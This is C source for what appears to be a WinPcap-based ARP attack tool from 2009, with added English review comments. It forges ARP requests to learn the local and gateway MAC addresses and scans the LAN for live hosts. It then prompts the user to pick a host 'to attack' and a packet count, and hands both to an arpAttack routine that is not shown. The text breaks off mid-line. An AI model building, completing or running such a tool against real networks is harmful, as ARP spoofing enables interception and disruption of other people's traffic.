/*
author:fallgold
email:heidaizx@126.com
date:2009.8.14
HomePage:www.fallgold.cn
*/
#include "pcap.h"
#include "remote-ext.h"
#include "process.h"
#pragma pack(1)// pack the structs declared below to 1-byte alignment so they carry no padding and match the on-wire frame layout
#pragma comment(lib,"wpcap.lib")
#pragma comment (lib,"ws2_32.lib")
#define ETH_IP 0x0800 // IPv4 EtherType; written into the ARP protocol-type field by the request builders below
#define ETH_ARP 0x0806 // ARP EtherType; written into the Ethernet frame-type field
#define ARP_REPLY 0x0002 // ARP opcode: reply
#define ARP_REQUEST 0x0001 // ARP opcode: request
#define ARP_HARDWARE 0x0001 // ARP hardware type: Ethernet
// ARP payload for Ethernet/IPv4. The fields add up to 28 bytes under pack(1) only when
// unsigned long is 4 bytes (the case for MSVC on Windows); with an 8-byte unsigned long
// the struct grows to 36 bytes and no longer fits the 42-byte send buffers used below.
struct arp_head
{
unsigned short hardware_type; // hardware type
unsigned short protocol_type; // protocol type
unsigned char hardware_add_len; // hardware address length
unsigned char protocol_add_len; // protocol address length
unsigned short operation_field; // operation (request / reply)
unsigned char source_mac_add[6]; // sender MAC address
unsigned long source_ip_add; // sender IP address (filled from inet_addr())
unsigned char dest_mac_add[6]; // target MAC address
unsigned long dest_ip_add; // target IP address (filled from inet_addr())
};
// Ethernet header. The fields declared here total 6 + 6 + 2 = 14 bytes under pack(1)
// (the original comment gave 18 bytes, which does not match these fields).
struct ethernet_head
{
unsigned char dest_mac_add[6]; // destination MAC address
unsigned char source_mac_add[6]; // source MAC address
unsigned short type; // frame type (EtherType)
};
// Complete ARP frame: the Ethernet header immediately followed by the ARP payload.
struct arp_packet
{
ethernet_head ed; // Ethernet header
arp_head ah; // ARP payload
};
struct host // IP and MAC address of one host
{
unsigned long ip; // IP address; main copies it straight into in_addr.S_un.S_addr for printing
unsigned char mac[6]; // MAC address
};
host pcGroup[256]; // host table; main prints entries 0..aliveNum-1
// NOTE(review): this repeats pack(1) instead of restoring the default packing; it looks
// like "#pragma pack()" was intended here - confirm before changing, later structs may rely on it.
#pragma pack(1)
pcap_t *adhandle; // capture handle of the adapter selected in main
unsigned char selfMac[6]; // this machine's MAC address
unsigned char getWayMac[6]; // the gateway's MAC address
int GetSelfMac(); // obtains the local MAC address
int getGateWayMac(); // obtains the gateway MAC address
HANDLE hThread; // thread handle
DWORD ThreadId; // thread ID (main passes NULL to CreateThread, so it is not filled in there)
void GetlivePc(); // receive thread: captures ARP packets and stores the MAC and IP of live hosts
void sendArpPacket(); // sends ARP request packets onto the LAN
BOOL flag = FALSE; // thread control flag; main polls it before listing hosts
int aliveNum = 0; // number of live hosts recorded
void arpAttack(int choice,int attackTimes); // attack routine (defined outside this excerpt)
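/*
 * Interactive entry point.
 *
 * Steps, in order:
 *   1. List the capture devices and read an interface number from stdin.
 *   2. Open the chosen adapter in promiscuous mode (global adhandle).
 *   3. Retry GetSelfMac() and getGateWayMac() until each reports success.
 *   4. Start GetlivePc on a worker thread, call sendArpPacket(), wait for the
 *      thread, then poll `flag` once per second until it is set.
 *   5. Print pcGroup[0..aliveNum-1], read a host index and a repeat count
 *      from stdin, and pass both to arpAttack().
 *
 * Returns 0 after arpAttack() returns and -1 on a setup failure; a failed
 * device enumeration exits with status 1, and rejected input at the last two
 * prompts exits with status 0.
 */
int main()
{
    pcap_if_t *alldevs;
    pcap_if_t *d;
    int inum = 0;
    int i = 0;
    int choice = 0;
    int attackTimes = 0;
    char errbuf[PCAP_ERRBUF_SIZE];
    struct in_addr in;

    /* Enumerate the local capture devices. */
    if (pcap_findalldevs_ex(PCAP_SRC_IF_STRING, NULL, &alldevs, errbuf) == -1)
    {
        fprintf(stderr,"Error in pcap_findalldevs: %s\n", errbuf);
        exit(1);
    }

    /* Print the device list, numbered from 1. */
    for (d = alldevs; d; d = d->next)
    {
        printf("%d. %s", ++i, d->name);
        if (d->description)
            printf(" (%s)\n", d->description);
        else
            printf(" (No description available)\n");
    }
    if (i == 0)
    {
        printf("\nNo interfaces found! Make sure WinPcap is installed.\n");
        return -1;
    }

    printf("Enter the interface number (1-%d):",i);
    /* A failed conversion leaves inum unset, so non-numeric input is rejected
       together with out-of-range numbers. */
    if (scanf("%d", &inum) != 1 || inum < 1 || inum > i)
    {
        printf("\nInterface number out of range.\n");
        /* Release the device list. */
        pcap_freealldevs(alldevs);
        return -1;
    }

    /* Walk to the selected adapter. */
    d = alldevs;
    for (i = 0; i < inum - 1; i++)
    {
        d = d->next;
    }

    /* Open the device. */
    adhandle = pcap_open(d->name,                   /* device name */
                         65536,                     /* snapshot length, large enough for whole frames */
                         PCAP_OPENFLAG_PROMISCUOUS, /* promiscuous mode */
                         1000,                      /* read timeout in milliseconds */
                         NULL,                      /* remote authentication: unused */
                         errbuf);                   /* error buffer */
    if (adhandle == NULL)
    {
        fprintf(stderr,"\nUnable to open the adapter. %s is not supported by WinPcap\n", d->name);
        /* Release the device list. */
        pcap_freealldevs(alldevs);
        return -1;
    }
    /* d->name is not used past this point, so the list can be released now
       instead of being leaked for the rest of the run. */
    pcap_freealldevs(alldevs);

    printf("本机mac地址为: ");
    while (GetSelfMac() == 0)
    {
        /* retry until the local MAC has been captured */
    }
    printf("\n");
    printf("网关mac地址为: ");
    while (getGateWayMac() == 0)
    {
        /* retry until the gateway MAC has been captured */
    }

    /* NOTE(review): GetlivePc is declared as void GetlivePc() and cast to
       LPTHREAD_START_ROUTINE; its signature does not match the thread-start
       prototype. Fixing that needs a change to GetlivePc itself. */
    hThread=CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)GetlivePc,NULL,0,NULL);
    if (hThread == NULL)
    {
        /* Without the receive thread the wait below returns at once and the
           flag poll would never end. */
        fprintf(stderr,"CreateThread failed: %lu\n", (unsigned long)GetLastError());
        pcap_close(adhandle);
        return -1;
    }
    sendArpPacket();
    WaitForSingleObject(hThread,INFINITE);

    /* Wait for the control flag before listing hosts. */
    while (!flag)
    {
        Sleep(1000);
    }

    /* NOTE(review): the code that fills pcGroup and aliveNum is outside this
       function; confirm it keeps aliveNum within the 256-entry table. */
    for (i = 0; i < aliveNum; i++)
    {
        in.S_un.S_addr=pcGroup[i].ip;
        /* inet_ntoa() returns a string, so the IP is printed with %s; the
           original passed that pointer to %x. Printing directly also removes
           the unbounded sprintf into a 100-byte buffer. */
        printf("序号: %d IP: %s Mac: %02x-%02x-%02x-%02x-%02x-%02x\n",
               i+1,
               inet_ntoa(in),
               pcGroup[i].mac[0],
               pcGroup[i].mac[1],
               pcGroup[i].mac[2],
               pcGroup[i].mac[3],
               pcGroup[i].mac[4],
               pcGroup[i].mac[5]);
    }

    printf("请输入要攻击的主机序号(1-%d):",aliveNum);
    /* NOTE(review): 0 passes this range check although the prompt advertises
       1..aliveNum; how arpAttack treats 0 is not visible here - confirm. */
    if (scanf("%d",&choice) != 1 || choice<0 || choice>aliveNum)
    {
        printf("输入越界,程序退出!");
        exit(0);
    }
    printf("\n为了达到较好的效果请你发送数据包的个数不小于100\n");
    printf("请输入要攻击的次数:");
    if (scanf("%i",&attackTimes) != 1 || attackTimes<0)
    {
        printf("输入越界,程序退出!");
        exit(0);
    }

    /* Hand the selected index and repeat count to the attack routine. */
    arpAttack(choice,attackTimes);
    return 0;
}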
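/*
 * Learn the MAC address of the capture adapter and store it in selfMac.
 *
 * Broadcasts one ARP request on adhandle (sender MAC 0f:0f:0f:0f:0f:0f,
 * sender IP 219.219.71.230, target IP 219.219.71.232), then reads captured
 * frames until an ARP reply whose target-IP field equals 219.219.71.230 is
 * seen. The sender MAC of that reply (frame bytes 22..27) is copied into
 * selfMac and printed as hex. The fixed sender MAC and the two hard-coded
 * addresses make this probe frame easy to recognise in a capture.
 *
 * Returns 1 when a MAC was captured, 0 when the send failed or the capture
 * loop ended with an error first. main() calls this repeatedly until it
 * returns 1.
 */
int GetSelfMac()
{
    /* 14-byte Ethernet header + 28-byte ARP payload. The two memcpy calls
       below fit only while sizeof(eh) + sizeof(ah) == 42, i.e. while
       unsigned long is 4 bytes and pack(1) is in effect. */
    unsigned char sendbuf[42];
    int found = 0;
    int res;
    int i;
    ethernet_head eh;
    arp_head ah;
    struct pcap_pkthdr * pkt_header;
    const u_char * pkt_data;
    /* Values to match in received frames, kept in network byte order so they
       can be compared bytewise against the packet data. */
    const unsigned short eth_arp = htons(ETH_ARP);
    const unsigned short arp_reply = htons(ARP_REPLY);
    const unsigned long probe_ip = inet_addr("219.219.71.230");

    memset(eh.dest_mac_add,0xff,6);
    memset(eh.source_mac_add,0x0f,6);
    memset(ah.source_mac_add,0x0f,6);
    memset(ah.dest_mac_add,0x00,6);
    eh.type = htons(ETH_ARP);
    ah.hardware_type = htons(ARP_HARDWARE);
    ah.protocol_type = htons(ETH_IP);
    ah.hardware_add_len = 6;
    ah.protocol_add_len = 4;
    ah.operation_field = htons(ARP_REQUEST);
    ah.dest_ip_add = inet_addr("219.219.71.232");
    ah.source_ip_add = inet_addr("219.219.71.230"); /* arbitrarily chosen requester IP */

    memset(sendbuf,0,sizeof(sendbuf));
    memcpy(sendbuf,&eh,sizeof(eh));
    memcpy(sendbuf+sizeof(eh),&ah,sizeof(ah));

    if (pcap_sendpacket(adhandle,sendbuf,42) != 0)
    {
        /* GetLastError() returns a DWORD, so print it as unsigned long. */
        printf("PacketSendPacket in getmine Error: %lu\n",(unsigned long)GetLastError());
        return 0;
    }
    printf("\nPacketSend succeed\n");

    while ((res = pcap_next_ex(adhandle,&pkt_header,&pkt_data)) >= 0)
    {
        if (res == 0)
        {
            /* Read timeout: pkt_header and pkt_data do not describe a packet. */
            continue;
        }
        if (pkt_header->caplen < sizeof(sendbuf))
        {
            /* Frame too short to hold Ethernet + ARP; the reads at offsets
               up to 41 below would run past the captured data. */
            continue;
        }
        /* memcmp avoids dereferencing unaligned, type-punned pointers into
           the packet buffer. Offsets: 12 = EtherType, 20 = ARP opcode,
           38 = ARP target IP. */
        if (memcmp(pkt_data+12,&eth_arp,sizeof(eth_arp)) == 0 &&
            memcmp(pkt_data+20,&arp_reply,sizeof(arp_reply)) == 0 &&
            memcmp(pkt_data+38,&probe_ip,4) == 0)
        {
            for (i = 0; i < 6; i++)
            {
                selfMac[i] = pkt_data[22+i]; /* ARP sender MAC */
                printf("%02x",selfMac[i]);
            }
            found = 1;
            break;
        }
    }
    return found;
}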
int getGateWayMac()
{
unsigned char sendbuf[42];//arp包结构大小
int i = -1;
int res;
ethernet_head eh;
arp_head ah;
struct pcap_pkthdr * pkt_header;
const u_char * pkt_data;
memset(eh.dest_mac_add,0xff,6);
memcpy(eh.source_mac_add,selfMac,6);
memcpy(ah.source_mac_add,selfMac,6);
memset(ah.dest_mac_add,0x00,6);
eh.type = htons(ETH_ARP);
ah.hardware_type = htons(ARP_HARDWARE);
ah.protocol_type = htons(ETH_IP);
ah.hardware_add_len = 6;
ah.protocol_add_len = 4;
ah.operation_field = htons(ARP_REQUEST);
ah.dest_ip_add = inet_addr("219.219.71.1");
ah.source_ip_add = inet_addr("219.219.71.232");
memset(sendbuf,0,sizeof(sendbuf));
memcpy(sendbuf,&eh,sizeof(eh));
memcpy(sendbuf+sizeof(eh),&ah,sizeof(ah));
if(pcap_sendpacket(adhandle,sendbuf,42)==0)
{
printf("\nPacketSend succeed\n");
}
else
{
printf("PacketSendPacket in getmine Error: %d\n",GetLastError());
return 0;
}
while((res = pcap_next_ex(adhandle,&pkt_header,&pkt_data)) >= 0)
{
if(*(unsigned short *)(pkt_data+12) == htons(ETH_ARP)&&
*(unsigned short*)(pkt_data+20) == htons(ARP_REPLY)&&
*(unsigned long*)(pkt_data+38) == inet_